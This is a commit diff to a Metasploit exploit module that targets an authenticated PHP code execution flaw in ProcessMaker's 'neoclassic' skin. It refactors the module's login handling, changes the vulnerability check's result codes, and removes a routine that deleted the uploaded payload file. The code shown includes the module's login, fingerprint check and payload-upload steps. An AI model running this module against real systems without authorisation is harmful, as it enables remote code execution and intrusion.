Clean processmaker_exec

modules/exploits/multi/http/processmaker_exec.rb

@@ -17,10 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits a PHP code execution vulnerability in the
         'neoclassic' skin for ProcessMaker Open Source which allows any
-        authenticated user to execute PHP code.
-
-        The vulnerable skin is installed by default in version 2.x and
-        cannot be removed via the web interface.
+        authenticated user to execute PHP code. The vulnerable skin is
+        installed by default in version 2.x and cannot be removed via
+        the web interface.
       },
       'License'        => MSF_LICENSE,
       'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
@@ -54,19 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
-  #
-  # Clean up on new session
-  #
-  def on_new_session(client)
-    print_warning("#{peer} - Deleting #{@fname}")
-    if client.type == "meterpreter"
-      client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-      client.fs.file.rm(@fname)
-    else
-      client.shell_command_token("rm #{@fname}")
-    end
-  end
-
   #
   # Send command for execution
   #
@@ -116,11 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
       print_error("#{peer} - Connection failed")
+      return false
     end
     if res and res.code == 200 and res.body =~ /Loading styles and images/
       print_good("#{peer} - Authenticated as user '#{user}'")
+      return true
     else
-      fail_with(Failure::NoAccess, "#{peer} - Authenticating as user '#{user}' failed")
+      print_error("#{peer} - Authenticating as user '#{user}' failed")
+      return false
     end
   end
 
@@ -130,7 +119,9 @@ class Metasploit3 < Msf::Exploit::Remote
   def check
     # login
     @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
-    login(datastore['USERNAME'], datastore['PASSWORD'])
+    unless login(datastore['USERNAME'], datastore['PASSWORD'])
+      return Exploit::CheckCode::Unknown
+    end
 
     # send check
     fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10)
@@ -140,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
       if res and res.body =~ /#{fingerprint}/
         return Exploit::CheckCode::Vulnerable
       elsif res
-        return Exploit::CheckCode::Detected
+        return Exploit::CheckCode::Safe
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
       print_error("#{peer} - Connection failed")
@@ -179,7 +170,9 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     # login
     @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
-    login(datastore['USERNAME'], datastore['PASSWORD'])
+    unless login(datastore['USERNAME'], datastore['PASSWORD'])
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    end
 
     # upload payload
     @fname  = "#{rand_text_alphanumeric(rand(10)+10)}.php"